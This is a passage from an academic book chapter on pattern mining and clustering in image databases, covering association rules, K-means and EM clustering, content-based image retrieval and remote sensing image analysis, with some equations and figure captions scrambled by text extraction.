the literature, there are a lot of image database applications which are OLTP-oriented databases; that is, their vocation is image data management and not image data analysis. However, a few image data warehouses exist. They are all closely linked to specific applications, such as medical applications (e.g., Wong, Hoo, Knowlton, Laxer, Cao, Hawkins, et al., 2002). The proposed architectures of image data warehouses may be applied only to a given field. They cannot be generalised to other fields. No general methodological approach suitable for image data warehouses has been defined. To do so, we extend the images with the complex data. Henceforth, we will consider the complex data in a general way.
63
Pattern Mining and Clustering on Image Databases
Frequent Pattern Mining Frequent patterns resulting from mining are represented in a specific form called association rule. A typical example of association rule mining is market basket analysis. To analyse customer behaviour (i.e., to obtain information about customers and why they make purchases), Agrawal, Imielinski, and Swami (1993) introduced the association rule concept. Faced with the very huge amount of sales data, the authors developed an algorithm generating all significant rules between items in the database (i.e., an itemset is the set of items in transactions or rules). Such computed rules may be useful for taking decisions and are very easy to interpret. For example, placing products often purchased together at opposite ends of the store may entice customers buying such products to pick up other products along the way. Thus, the discovered association rules may allow stores to lay out products on the shelves more efficiently. An association rule example is “if a customer buys plants, then he also buys compost”. Since 1993, a lot of studies concerning extensions (the method may be applied in any domain where object clustering is judicious) and improvements (more efficient algorithms) of association rule mining problems have been proposed; more details may be found in surveys (Goethals, 2005). The association rule search in a database is probably the problem which most strongly contributed to the emergence of data mining. Today, association rule mining is one of the most popular problems when we look for interesting associations or correlations from a large data items set. More precisely, association rule mining is based on the following concepts. A transaction corresponds to a transaction identifier associated with a finite set of items called itemset. While a transaction database D is a finite multiset of transactions, an association rule is an implication of the form X ⇒ Y where the body or antecedent X and the head or consequent Y are itemsets having no item in common. Two measures of
64
rules interestingness are defined: rule support and rule confidence. The support of an association rule X ⇒ Y in D is the support of X ∪ Y in D where the support of an itemset X in D is the number of transactions in the cover of X in D and the cover of an itemset X in D corresponds to the transaction identifier set in D that supports X. The confidence of an association rule X ⇒ Y in D corresponds to the conditional probability of having Y contained in a transaction, given that X is already contained in this transaction. More intuitively, the rule support represents the usefulness of mined rules while the rule confidence corresponds to their certainty. In fact, an association rule is considered interesting if and only if it is both a frequent association rule (i.e., a rule whose support exceeds a given minimal support threshold) and a confident association rule (i.e., a rule whose confidence exceeds a given minimal confidence threshold). In the same way, a frequent itemset is an itemset whose support exceeds a given minimal support threshold. Thus given a transaction set, the general frequent pattern mining problem consists in generating all association rules whose support and confidence exceed the user or expert-specified minimum threshold values (rf. Agrawal et al., 1993, for further details on the problem description). In Han and Kamber (2001), association rules are classified into several categories according to different criteria. The authors distinguish association rules according to either the type of values they handle (such as Boolean values and quantitative values), the dimension of data implied in the rules (single/dimensional rules), the level of abstraction of the rules (single/multilevel association rules), or the various extensions to association mining (maximal frequent pattern, frequent closed itemsets). Methods for mining each one of these types of association rules is studied in Han and Kamber (2001, ch. 6). The problem of association rule mining from large databases is generally decomposed into two steps: the frequent itemset discovering process
Pattern Mining and Clustering on Image Databases
and the frequent and confident association rule generating process from the previous discovered frequent itemsets. The frequent itemset discovering process is time-consuming as the search space has an exponential size in terms of the number of items occurring in the transaction database. The first algorithm called AIS (Agrawal et al., 1993) proposed to solve the frequent set mining problem was improved and gave rise to the wellknown Apriori algorithm published independently by Agrawal and Srikant (1994) and Mannila, Toivonen, and Verlamo (1994). The improvement is based on the set support monotonicity property that states “every subset of a frequent itemset is itself a frequent itemset”. The Apriori algorithm is based on an iterative approach known as level-wise search, where k-itemsets (i.e., an itemset containing k items) are used to explore (k+1)-itemsets. A lot of studies on association rule mining techniques in large databases have been proposed. These studies cover a broad active spectrum of topics concerning fast algorithms based on the level-wise Apriori search (Agrawal & Srikant, 1994; Klemettinen, Mannila, Ronkainen, Toivonen, & Verkamo, 1994) and its variations such as table hashing (Park, Chen, & Yu, 1995), transaction reduction (Agrawal & Srikant, 1994; Han & Fu, 1995; Park et al., 1995), partitioning (Savasere, Omiecinski, & Navathe, 1995), sampling (Toivonen, 1996) with incremental updating and parallel algorithms (Cheung, Han, Ng, & Wong, 1996; Han, Karypis, & Kumar, 1997; Park, Chen, & Yu, 1995a) while passing by mining of generalised and multilevel rules (Han & Fu, 1995; Srikant & Agrawal, 1995). We can also mention mining long patterns and dense data sets (Bayardo, 1998; Bayardo, Agrawal, & Gunopulos, 1999), mining correlations and causal structures (Brin, Motwani, & Silverstein, 1997; Silverstein, Brin, Motwani, & Ullman, 1998), mining ratio rules (Korn, Labrinidis, Kotidis, & Faloutsos, 1998), query-based constraint mining of associations (Ng, Lakshmanan, Han, & Pang, 1998; Srikant, Vu, & Agrawal, 1997), mining cyclic and
calendric association rules (Ozden, Ramaswamy, & Silberschatz, 1998; Ramaswamy, Mahajan, & Silberschatz, 1998), mining partial periodicities (Han, Dong, & Yin, 1999), rule mining query languages (Meo, Psaila, & Ceri, 1996), mining of quantitative and multidimensional rules (Fukuda, Morimoto, Morishita, & Tokuyama, 1996; Kamber, Han, & Chiang, 1997; Lent, Swami, & Widom, 1997; Miller & Yang, 1997; Srikant & Agrawal, 1996), and mining of frequently occurring patterns related to time or other sequences (Agrawal & Srikant, 1995).
Data Clustering The goal of clustering is to identify subsets of data called clusters (or groups) where a cluster usually corresponds to objects that are more similar to each other than they are to objects from other clusters. There are different ways to group objects. In hard clustering, each object belongs to one and only cluster: the clusters are disjoints. In a soft approach, clusters can be overlapped: an object can belong to zero, one, or several clusters. The probabilistic approach assumes that each object belongs to clusters depending on a probability. Finally, in a fuzzy clustering approach, each object belongs to all the clusters with an assigned membership for each cluster. Although a lot of clustering algorithms have been developed with a lot of application fields, no one can be used to solve all the problems (Kleinberg, 2002). Comprehensive surveys of clustering principles and techniques can be found in Berkhin (2002), Jain, Murty, and Flynn (1999), and Xu and Wunsch (2005). Traditionally, clustering methods are divided into hierarchical and partitioning techniques. Whereas partitioning algorithms produce a flat structure, hierarchical clustering algorithms organise data into a hierarchical structure such as a tree of clusters or a dendrogram: a cluster node contains child-clusters which are a partitioning of this cluster.
65
Pattern Mining and Clustering on Image Databases
Hierarchical clustering methods, such as CURE (Guha, Rastogi, & Shim, 1998), ROCK (Guha, Rastogi, & Shim, 2000), Chameleon (Karypis, Han, & Kumar, 1999), and BIRCH (Zhang, 1997), are categorised into agglomerative and divisive approaches. Starting with the one object cluster, agglomerative methods iteratively merge clusters, depending on their similarity. Divisive methods start with one cluster containing all objects to be clarified and recursively split clusters until a criterion (number of clusters, size of clusters, etc.) is achieved. To merge or split subsets of objects, the distance between clusters (linkage metric) has to be defined. In fact, most hierarchical clustering algorithms are variant of a single link (minimum distance between objects), a complete link (minimum distance between objects), or an average link. The type of the link metric used significantly affects results: a complete-link algorithm produces tightly bound or compact clusters (Baeza-Yates, 1992) whereas a simple-link algorithm suffers from the chaining effect (Nagy, 1968). While hierarchical algorithms build clusters iteratively, partitioning algorithms learn clusters directly. The most popular partitioning algorithms are partitioning relocation methods. Such a method tries to discover clusters by iteratively relocating data between subsets. These methods can be categorised into probabilistic clustering, for example, the EM framework (Mitchell, 1998), k-medoid methods, such as CLARA (Kaufman & Rousseew, 1990), and squared-error based methods like K-means (MacQueen, 1967). A density-based partitioning algorithm such as DBSCAN (Ester, Kriegel, Dansder, & Xu, 1996) tries to discover dense connected components which are flexible in terms of their shape. Partitioning methods take advantage in applications involving large data sets for which the construction of a dendrogram is computationally prohibitive. In most cases, however, the difficult
66
problem is the choice of the number of output clusters. Some methods are proposed to resolve this problem such as ISODATA (Ball & Hall, 1967). In practice, the algorithm is typically run multiple times with different starting states (initial centers of clusters, numbers of clusters), and the “best” output clustering is kept. More complex search methods, such as evolutionary algorithms (Fogel, 1994), can also be used to explore the solution space better and faster. Competitive neural networks are often used to cluster data. Based on data correlation, similar data are grouped by the network and represented by a neurone. Data are presented at the input and are associated with the output neuron; the weights between the input neurons and the output neurons are iteratively changed. Among this type of algorithm, the most popular algorithm is the self-organising map (SOM) (Kohonen, 1990).
IMAGE PROCESSING USING DATA WAREHOUSES, PATTERN MINING, AND CLASSIFICATION Different types of information are related to images: those related to a low-level description (pixels, resolution, texture, and size), content information, and lastly, information linked to the context (domain, etc.). The use of this information must take into account data processing: relevant data should be extracted and structured as a preprocessing stage. Complex data warehousing is a solution allowing us to describe analysis contexts. Among all the existing analysis techniques, patterns discovery can outline associations between images, evolution of geographical areas, and so forth. Image clustering is used to summarise and structure data, and can be useful in the case of image content-based retrieval to reduce the search space.
Pattern Mining and Clustering on Image Databases
Complex Data Warahouses: How Image Data Can Be Managed in Such Data Warehouses In complex data warehouses, new difficulties appear because of data nature and specificity. Structuring, modeling, and analysing image data is a difficult task that requires the use of efficient techniques and powerful tools, such as data mining. complex data produce different kinds of information that are represented as metadata. These metadata are essential when warehousing complex data. Furthermore, domain-specific knowledge becomes necessary to warehouse complex data properly, for example, under the form of ontologies. Analysing complex data raises, among others, the issue of selecting analysis axes. Data mining may help reach this goal. Furthermore, OLAP operators are not well suited for non-additives complex data measures. In this context, data mining techniques such as clustering can be used to develop appropriate OLAP operators for complex data (Ben Messaoud, Boussaïd, & Loudcher Rabaseda, 2006). Such data mining techniques allow us to perform exploratory analyses while exploiting causality relationships in complex data. The growing interest concerning the storage and knowledge discovery in complex data has lead research communities to look for new architectures and more suitable processing tools. Indeed, organisations need to deploy data warehouses in order to integrate access and analyse their complex data. For example, a medical file usually consists of data drawn from various forms. A patient’s medical history might be recorded as plain text; numerous biological exam results might be differently represented. The medical file could also include radiographies (images) or echographies (video sequences). Successive diagnosis and therapies might be recorded as text or audio documents, and so on. If one needs to explore this kind of data, then the warehousing
approach should be adapted to take into account the specificity of such data. In opposition to classical solutions, complex data warehouse architectures may be numerous and very different from one another. However, two approaches emerge. The first family of architectures is data-driven and based on a classical, centralised data warehouse where data are the main focus. XML document warehouses are an example of such solutions (Boussaid, Ben Messaoud, Choquet, & Anthoard, 2006a; Nassis, Rajagopalapillai, Dillon, & Rahayu, 2005; Pokorny, 2001; Rusu, Rahayu, & Taniar, 2005). They often exploit XML views, which are XML documents generated from whole XML documents and/or parts of XML documents (Baril & Bellahsene, 2000). A data cube is then a set of XML views. The second family of architectures includes solutions based on virtual warehousing, which are process-driven and where metadata play a major role. These solutions are based on mediator-wrapper approaches (Maiz, Boussaïd, & Bentayeb, 2006; Wiederhold, 1995) and exploit distributed data sources. The schemas of such sources provide the most important information that mediators exploit to answer user queries. Data are collected and modeled in a multidimensional way (as data cubes, to constitute an OLAP analysis context) on the fly to answer a given decision support need. Note that complex data are generally represented by descriptors that may either be low-level information (an image size, an audio file duration, the speed of a video sequence, etc.) or related to semantics (relationships between objects in a picture, topic of an audio recording, identification of a character in a video sequence, and so on). Processing the data thus turns out to process their descriptors. Original data are stored, for example, as binary large objects (BLOBs), and can also be exploited to extract information that could enrich their own characteristics (descriptors and metadata) (Boussaid, Tanasescu, Bentayeb, & Darmont, 2006b).
67
Pattern Mining and Clustering on Image Databases
In today’s competitively managed environment, decision makers must be able to interpret trends, identify factors, and utilise information based on clear, timely data presented in a meaningful format. Warehousing complex data, and particularly image data, is well suited to structuring, storing, accessing, and querying these data. The capacity to organise the image data in the data warehouse structure allows us to carry out online analytical processing of the warehoused data. To increase this ability, it is necessary to enhance the classical OLAP operators with data mining techniques, such as clustering or pattern mining, and to elaborate exploratory and predictive analyses (Ben Messaoud et al., 2006).
Pattern Mining Image mining (Simoff, Djeraba, & Zaïane, 2002; Zhang, Hsu, & Lee, 2001) is still a recent research field and is not very well developed yet because extracting relevant knowledge from image data still remains a difficult task. Mining association rules relating to images cannot be considered as simply taking each image as a transaction and computing frequent patterns that occur among different images. Image mining raises some new issues (Han & Kamber, 2001) such as rule mining which considers various resolutions, measures, and rules adjustment to the nature of images as well as a detailed attention to the spatial relationships within the images. In Han and Kamber (2001), three association rule categories are distinguished: associations between image content features and non-image content features, associations among image contents with no spatial relationships, and associations among image contents with spatial relationships. In recent years, there has been some research dealing with rule association mining in image data. In Zaïne, Han, and Zhu (2000), authors have proposed methods for mining content-based associations with recurrent items and with spatial relationships from large visual data repositories.
68
A progressive resolution refinement approach has been proposed in which frequent itemsets at rough resolutions levels are mined, and progressively, finer resolutions are mined only on candidate frequent itemsets derived from mining through rough resolution levels. The proposed algorithm is an extension of the well-known Apriori algorithm taking account of the number of object occurrences in the images. Ordonez and Omiecinski (1999) state that the image mining problem relates not only to the data mining field, but also to the fields of the databases, image understanding, and content-based image retrieval. He has proposed a first attempt to combine association rules and images: an algorithm which would discover object association rules in image databases and which would be based on image content. The algorithm relies on four majors steps: feature extraction, object identification, auxiliary image creation, and object mining. The main advantage of this approach is that it does not use any domain knowledge and does not produce meaningless rules or false rules. However, it suffers from several drawbacks, most importantly, the relative slowness of the feature extraction step. It does not work well with complex images either. Djeraba (2002) proposes an architecture which integrates knowledge extraction from image databases with the image retrieval process. Association rules are extracted to characterise images, and they are also used to classify new images during insertion. In Tollari, Glotin, and Le Maitre (2005), a recent experiment has been carried out to show the dependencies between textual and visual indexation. This experiment was performed on different corpuses containing photographs which were manually indexed by keywords. The authors then compared text-only classification, visual-only classification, and the fusion of textual and visual classification. They have shown that the fusion significantly improves text-only classification.
Pattern Mining and Clustering on Image Databases
In Ardizzone, Daurel, Maniscalco, and Rigotti (2001), association rules between low-level descriptors (i.e., colour descriptors) and semantic descriptors (i.e., names of painters) are extracted. The authors recommend using discovered association rules as complementary information to improve indexing, query optimisation in image databases. Finally, in Morin, Kouomou Chopo, and Chauchat (2005) data mining techniques are used in order to improve time and quality of the content-based retrieval in an image database, namely clustering and association rules. The suggested strategy is based on both an automatic selection of the content-based retrieval features and on the association rules in order to reduce the number of descriptors. Thus the users may carry out their image research without being concerned with nature or quality of the subjacent descriptors. The results so obtained remain relatively satisfactory compared to an exhaustive sequential search. Moreover, during search processing, intermediate results are progressively merged and proposed to the user. The brevity of this section dedicated to images and pattern mining shows how tiny the intersection of these two fields is. What pattern mining can contribute to image retrieval and image understanding thus remains an open question.
Image Classification Two domains are concerned with image clustering. On one hand, a key step for structuring the database is image content clustering employed in order to improve “search-by-query” in large image databases. Each image is viewed as a collection of local features (a colour histogram, a textural index, etc.). The goal is to find a mapping between the archive images and the classes (clusters) so that the set of classes provides essentially the same prediction, or information, about the image archive as the entire image-set collection. The generated classes provide a concise summarisation and visualisation
of the image content: this process is considered as image-set clustering. Note that the definition of a clustering scheme requires the determination of two major components in the process: the input representation space (used feature space, global vs. local information) and the distance measure defined in the selected feature space. On the other hand, partitioning pixels from an image into groups of coherent properties by clustering is a popular method of image segmentation: pixels that are similar in low level features (e.g., color or radiometric features) and are connected in the image (4 or 8 connectivity) are grouped into one region. However, the problem lies in the difficulty to define the similarity measurements, for example, to define them in terms of intensity, colour, texture, or other parameters. Each element can be used alone, but they can also be compounded together to represent an image pixel. Thus, each pixel can be associated to become a feature vector. This section presents three approaches to perpixel image clustering: the K-means algorithm, the EM one, and the multistrategical approach.
The K-means Algorithm The K-means algorithm (MacQueen, 1967) attempts to minimise the cost function, F = ∑ ∑ d ( xi , ck ), where K is the number of k ∈[1, K ] xi ∈Ck
clusters and ck is the center of the k-th cluster. First, the initial set of centers is randomly chosen. Then to minimise F, the K-means algorithm iterates two steps: • •
Labeling: Each object in the data set is assigned to the nearest cluster. Recentering: A new center for all the clusters is recalculated.
The K-means algorithm is very simple and easy to implement. Its time complexity is O(NKd) where d is the dimension of the objects: such an
69
Pattern Mining and Clustering on Image Databases
Figure 1. Spot image (Strasbourg)
corresponds to the class of “building” (in agreement with expert evaluation).
algorithm can be used to cluster large data sets such as image data. Figure 1 shows an example of a remotely sensed image. The area (approximately 10 km 2) is the eastern part of the agglomeration of Strasbourg (France) with a resolution of 20m in a multispectral mode (three radiometric bands). Its size is 250 x 200 pixels. Figure 2 shows an instance of a K-means running (with 5 classes and 10 iterations) on the SPOT remote sensing image. The circle on the first image (on the left) highlights the sub-area which evolves during the 10 iterations. The area is the downtown of Strasbourg and is composed of building areas. At the beginning, some pixels are blue, a colour which corresponds to the “water” class. One can see that almost all these pixels emigrate towards the “gray” class which
In model-based clustering, individual clusters are described by a probability distribution. Each pixel is assumed to be produced by a probability density associated with one of the K clusters. The maximum likelihood (ML) approach then considers that the best estimate for ( is the unknown parameter for the density associated with the k-th cluster) is the one that maximises the log-likelihood given by: ln( X , θ) =
⎛ ⎞ log ⎜ ∑ πk . p ( xi θk ) ⎟ i∈[1, N ] ⎝ k∈[1, K ] ⎠
∑
where πk is the prior probability for cluster Ck. In most circumstances, the solution of the likelihood equation cannot be analytically computed. Efficient iterative Expectation-Maximisation (EM) schemes exist to perform the log-likelihood optimisation (Dempster, 1977; McLachlan, 1997). In such schemes, each object xi carries not only its observable attributes but also a hidden cluster label vector with if . Thus the log-likelihood for the data set is given by: E ( X , θ) =
∑ ∑
i∈[1, N ] k ∈[1, K ]
zi , k .log p( xi θk )
Figure 2. Example of K-means evolution
Iteration 1
70
Iteration 4
Iteration 8
Final result
Pattern Mining and Clustering on Image Databases
The summation terms inside Pog have been eliminated. One can observe that: • •
If the density parameters are known, the cluster label vector can be easily set. If cluster label vectors are known, estimating the density parameters is easy. In fact, the EM algorithm iterates two steps:
• •
E-step (Expectation) to compute the expectation of the complete data. M-step (Maximisation) to maximise the log-likelihood of the complete data and then estimate θ.
In the case of multivariate normal (Gaussian) density, the most used for image segmentation, the unknown parameters and for each cluster are estimated by the Expectation-Maximisation. Although the K-means and EM algorithms have been quite successful in both theory and practice, they present some problems. First, these algorithms are very sensitive to the selection of the initial partition: they may converge towards a local minimum if the initial partition is not properly chosen. Second, the number of clusters must be known. Unfortunately, there is no efficient and universal method to identify the number of clusters and the initial partitions. Certain strategies could be used to circumvent these problems. The most frequently used strategy consists in carrying out the algorithms several times with random initial partitions, with or without the same number of clusters, on either the whole data or on subsets from the original data only: the « best » result is then kept. Some techniques deal with the estimation of the number of clusters: ISODATA dynamically adjusts the number of clusters by merging and splitting clusters according to several criteria. Another relatively recent approach can also be also used. It is based on the idea that the information concerning objects offered by different classifiers is complementary (Kittler, 1998). Thus,
the combination of different classification methods may increase their efficiency and accuracy. A single classification is produced from results of methods which have different points of view: all individual classifier opinions are used to derive a consensual decision. These combining of methods circumvent some of the limitations of the methods used alone by taking advantage of the complementarities of the different classification methods used. For example, some classifiers only propose a partitioning of the data, whereas others give a hierarchy of classes or concepts as result. Combining the results allows us to automatically adjust the number of clusters of the partitioning methods according to the results presented by the hierarchical methods. Experiments show that this approach decreases the importance of the initial choices. A collaborative multistrategical clustering process is proposed in (Gançarski & Wemmert, 2005). This process is composed of three main steps: First, a phase of initial classifications is performed: classifications are computed by each method with its parameters. Then, an iterative phase of convergence of the results is performed. The three phases are repeated as long as the results improve in terms of their quality and as long as they converge to become more and more similar: 1. 2.
3.
A step of evaluation of the similarity between the results with mapping of the classes. A step of refinement of the results: (1) Conflict detection by evaluating the dissimilarities between results; (2) Local resolution of such conflicts; and (3) Management of these local modifications in the global result. A step of combination of the refined results.
For example, we present a test with six expected classes. The unsupervised classification methods used are:
71
Pattern Mining and Clustering on Image Databases
• • • •
The K-means algorithm with four initial random nodes. The K-means algorithm with eight initial random nodes. The EM algorithm with 15 classes. The conceptual classifier Cobweb with an acuity of 18.
We have obtained the results1 (Figure 3). These results have been refined according to multistrategical algorithm. We have obtained the following results (Figure 4). We appliedthe multiview voting algorithm described in (Wemmert & Gançarski, 2002) on these results. The unifying result (Figure 5a) is composed of five different classes. We present also in Figure 5b the voting result for all the objects: • • •
In white: All the methods agreed on the classification. In gray: One method disagreed with the other ones. In black: The nonconsensual objects (two or more results classified these objects differently).
IMAGE MINING ISSUES In this section, we present applications using the concepts described above. The first section tries to give some perspectives for image pattern mining. The second section deals with the extraction of information from images and briefly describes its application for the semantic Web. The last section describes an application in the field of remote sensing image databases.
Image Pattern Mining Image pattern mining can be used for images represented by low-level features such as earth exploration applications or images built from sonar or radar signals. These applications have a common point: the notion of evolution is very important. For example, in the case of images extracted from a sonar signal, the characterisation of seabed sediments and its evolution should be performed using pattern mining techniques. Consider, for example, that the records are grouped according to their localisation (i.e., the geographical areas
Figure 3. Initial clusterings
72
Kmeans – 4 classes
Kmeans – 8 classes
SOM – 16 classes
Cobweb – 27 classes
Pattern Mining and Clustering on Image Databases
Figure 4. Final clusterings
Kmeans – 5 classes
Kmeans – 6 classes
SOM – 5 classes
Cobweb – 4 classes
Figure 5. Unification
(a) Unifying result
in which the sonar has been used). Suppose that for one localisation, we have the sediment evolution. Then, it will be easy, using pattern mining techniques, to find common evolutions for a set of localisations. In the case of earth observation, a potential application is to study the evolution of a particular object or geographic area, such as a dense urban area for example. Pattern mining for content-
(b) Consensus
based image retrieval seems to be less relevant, but should be useful to reduce the search space. Association rules can be defined to determine an image cluster for a particular description. For example, you can state that if the dominant colours are yellow and brown, the images related to this description should be contained in cluster 2. Few experiments have been realised to use such a technique to reduce the search space. We think
73
Pattern Mining and Clustering on Image Databases
that research work could be done in the case of images represented by a set of pixel in order to describe data evolution.
Clustering and Characterisation Rules with the Service of Image Retrieval by Similarity The content-based image retrieval in large databases is based on two modules: the logical indexation and the retrieval. While the first one extracts the metadata (textual descriptors: keywords, annotations, and so forth; visual features like colour, shape, texture; spatial localisation, spatial constraints, etc.) associated to images and stores the extracted metadata in the database; the second one assists final users to efficiently retrieve images based on their visual and/or textual descriptions. The retrieval process, by means of a suited distance for each feature, computes the similarity between the user’s query and the image database. The best similar images in terms of their similarity value are then displayed by decreasing similarity. In this context, the scope of queries addressed to multimedia databases is very large and may include both objective and subjective content. Three levels of abstraction are distinguished (Eakins, 2002): (1) syntactic level: visual features, spatial localisation, and spatial constraints are used to retrieve images. This level is purely algorithmic. For instance, a query may be “Give me all the images containing red circles”; (2) semantic level including only objective content. In this level, objects appearing in images have to be identified. A query example may be “Give me all the images in which my children appear”; (3) semantic level with subjective content. This level involves complex reasoning about objects or scenes using human perception. Such a query may be “Give me all the images representing the notion of liberty” or “Give me all the images in which my friends are happy”. This level is also related to scene recognition as, for example, a child’s birthday: this scene can be
74
characterised by balloons, young faces, candles, cakes, and so forth. However, content-based image retrieval has reached some limitations, in particular a lack of semantics integration. Textual and visual feature combinations are sometimes not sufficient, particularly when semantic querying is predominant, that is, when the image and its context are necessary (as, for instance, the retrieval of audiovisual sequences about unemployment, the retrieval of images in which there is a strong feeling of sadness). This limit is known as the semantic gap between the visual appearance of an image and the idea the user has in mind of what images, including semantics, the user wants to retrieve. Thus, the content-based retrieval suffers from a lack of expressive power because it does not integrate enough semantics. Semantics is today a crucial point which it is impossible to circumvent as soon as one wishes to integrate, unify, or bring closer the metadata resulting from different sources. A lot of research is going in this direction. For example, we can mention the fusion of ontologies to search resources regardless of their nature (Hunter, 2001). We can also mention the definition of Web page semantics to improve the Web information retrieval since the semantics of a Web page is expressed through both its contexts (static context: author’s contribution and dynamic context: user’s contribution) and through its content (Grosky, Sreenath, & Fotouhi, 2002). Worth mentioning is also the proposed architecture in Troncy (2003) to reason on descriptions of video documents thanks to an audiovisual ontology. In the context of content-based retrieval, the problem of lack of semantics prevents final users from making good explorations and exploitations of the image database. In Bouet and Aufaure (2006), image mining is proposed to allow for a better image database exploration by exploiting the visual and textual image characterisation complementarily. The proposed approach is situated in an exploratory context (descriptive data mining). The desired objective may not be achieved
Pattern Mining and Clustering on Image Databases
without a strong synergy between image mining and visual ontology. On the hand, image mining concerns making associations between images from a large database. To produce a summarised view of an annotated image database and to reduce the research space, clustering and characterisation rules are combined. These data mining techniques are performed separately on visual descriptors and textual information (annotations, keywords, Web pages). On the other hand, a visual ontology is derived from the textual part and enriched with representative images associated to each concept
of the ontology. Ontology-based navigation can also be seen as a user-friendly and powerful tool to retrieve relevant information. These two approaches should make the exploitation and the exploration of a large image database easier. The process called “multimedia mining” is detailed more precisely in the Figure 6. Multimedia mining consists of several methods such as clustering and extraction of characteristic rules from clusters. These clusters and rules extracted from visual and textual descriptors may be seen as metadata associated to the considered image
Figure 6. The multimedia mining process
75
Pattern Mining and Clustering on Image Databases
database. While clustering is performed to reduce the research space, the characterisation rules are used to describe each cluster and to classify automatically a new image in the appropriate clusters. Because of their intrinsic nature difference (numeric vs. symbolic), textual descriptions (keywords, annotations, etc.), and visual descriptions (colour, shape, texture, spatial constraints) are dealt with separately, using well-suited techniques. Starting from feature sets (such as colour set, keyword set, texture set, colour and shape set, etc.), the system automatically clusters together similar images using a well-suited method. Then, in order to qualify the previous clusters, a more powerful representation than the cluster centroid may be chosen. These characterisation rules may be obtained either from all the points of a cluster (in order to have the most frequent patterns) or from a data aggregation (for example, a median histogram in the case of colour clusters, which is representative of the cluster content). In the image context, these rules are in the form of antecedent ⇒ consequent with certain accuracy, where antecedent and consequent correspond respectively to a visual feature value and a cluster. The accuracy is fundamental to estimate the quality of the induced rules. Statistical measures are used to estimate the rule accuracy. As far as the textual description processing is concerned, it requires a preprocessing phase in order to reduce the number of keywords and to keep only relevant keywords. This task is difficult and time-consuming, and needs an expert to validate the results obtained. Textual descriptions need to find a relevant similarity measure. Clustering can be performed by conceptual clustering such as the Cobweb, or by other techniques such as the K-means after the transformation of the initial keywords into numerical vectors. The extracted concepts are then hierarchically organised, using a priori knowledge, hierarchical classification techniques, or the expert’s knowledge of the application domain.
76
Once the search space reduction and the cluster characterisation by means of rules has been performed, descriptive metadata are stored in the database. These metadata represent the characteristics discovered and shared by images appearing in the same cluster, and they play an important role because they allow the user to navigate from the textual world towards the visual world, and conversely. The architecture presented in Figure 6 is well-suited to specific databases like fingerprint databases, face databases, and so forth. Indeed, image mining results depend on both the chosen clustering method and the estimated similarity quality. Without a real synergy between application fields, considered visual features, their modeling and the estimation of their similarity degree, the obtained descriptive metadata are not relevant to allow for a more interesting image database exploration. This architecture may also be adapted to general databases, and more particularly to the Web. As Web databases contain images of any domain, visual features are not very representative of particular concepts. This is the reason only the concept extraction phase is made. Visual clusters are deduced from textual clusters since they contain semantics by nature. The visual clusters which we obtain are then characterised by means of rules. This proposed architecture adaptation may be a new way to navigate Web image databases. Web search engines are able to index only Web images having a particular tag related to the image legend. For example, if you search images of “Champs Elysées” using Google Image, the result contains only images whose legend corresponds to the specified keyword. Results are then ranked and presented to the user according to their relevance. Some metadata concerning these images are also added, for example, the format (gif, pdf, etc.), the colour, and so forth. But, if the user wants to retrieve images of the “Champs Elysées” by night and only in black and white, no results are given by the search engine. Thus, in order to improve the Web images search, we should take into account both textual
Pattern Mining and Clustering on Image Databases
information in the Web pages and visual information. Textual information can be the legend represented by a special tag, a text under the image, and a free text in the Web page. In this last case, we can extract a word from paragraphs appearing before and after the image, and search frequent words to try to label the images. Some research has been done in this field. Integrating a visual and textual descriptor to improve the Web image search is still an unsolved problem.
Multistrategical Mining of Remote Sensing Images Databases In the last two decades, the Earth observation offer in optical and radar fields has been multiplied. With the new types of remote sensing images that have appeared since 1999 and the multiplication of the hyperspectral sensors that have several hundreds of bands, the users are faced with a huge stream of images. Since 1999, new types of images (HSR sensors like Quickbird, Orbviewor, hyperspectral sensors like AVIRIS, DAIS, CASI) have been providing a huge amount of data the user has to cope with in terms of spatial, spectral, and temporal resolution, depending on the objectives. In a context of city planning, it is necessary to support the identification, the localisation, and the formalisation of the urban elements (impervious surfaces, vegetation, water). Very often, the identification step requires some complementary aspects of a set of images and also ancillary data: seasonal to discriminate mineral surfaces (these may or may not be agricultural zones), spectral to supplement the range of the effective spectral answers, and finally, spatial to take into account (1) the relationships between the studied area and (2) the adequacy of the resolution of the pixel in relation to the objects of interest (for example, irrigated natural zones). However, the lack of methods facilitating the selection of useful data, the improvement of extraction of knowledge and the interpretation assistance adapted to the needs is still compel-
ling. Moreover, these methods do not allow for simultaneous and complementary approaches. Currently, the tendency is the development of object oriented methods where each object represents a set of homogeneous pixels and is built around some elementary characteristics (spectral, geometrical) and the spatial relationships between objects (contextual texture and topological relations). Monoformalism does not allow for an unequivocal way to identify heterogeneous objects in an urban area. The formalism must be adapted to each scale of analysis. The Fodomust project2 proposes a multiformalist approach, taking into account the level of creation of the object and its use. This solution provides a complete data mining process allowing for information extraction without data fusion (if not needed). Due to the heterogeneity and the complexity of remote sensing images, the current methods of extraction and assistance to interpretation are not effective enough to take into account the complementarity of the data. In this project, it is argued that the problem lies in the need to use multiformalisation on several levels of abstraction according to images resolutions. Thus, the main aim of our project is to study and define methods and tools able to simultaneously use different knowledge databases to localise, identify, and characterise objects as being urban elements. These databases are associated with different sources (radiometric sensors, aerial and areal photographs, etc.), data representing the same object information but at different times or in various formats, scales, and file types (free texts, Web documents, taxonomy, etc.) This is the reason why a complete process of mining complex data sets, using expert knowledge for selecting, extracting, and interpreting remote sensing images, is proposed (Figure 7): •
Data structuring and organising: The authors propose an architecture to structure and organise the set of data and metadata that are collected from the various physical
77
Pattern Mining and Clustering on Image Databases
Figure 7. Interpretation of remotely sensed image
•
78
data sources. They then design query mechanisms for image databases that exploit both low-level descriptors (date, location, etc.) and high-level semantic descriptors depicting the actual content of the images. This can allow us, on one hand, to select and cluster data sources (by fusion, for instance) and, on the other hand, to eliminate in these sources the noise, redundancies, and nonrelevant information that are massively present in remote sensing images. When exploiting several sources of knowledge and images, data mining may also be performed directly on the raw data. Object construction step: Image processing techniques (such as image segmentation which change the observed scale from pixels to regions) may greatly help to improve the
quality of identification and classification of objects contained in the considered images. Numerous segmentation techniques exist, and we propose to focus on the mathematical morphology principles. Indeed, mathematical morphology is not so often used in remote sensing, whereas it clearly presents several advantages in this application field, in particular, the possibility to characterise the different objects considering some of their properties such as shape, texture, size, topology, spatial relations, and so forth. The objectives are to elaborate multi-images morphological tools, to integrate knowledge into morphological analysis processes and to validate the methods over a large set of images.
Pattern Mining and Clustering on Image Databases
•
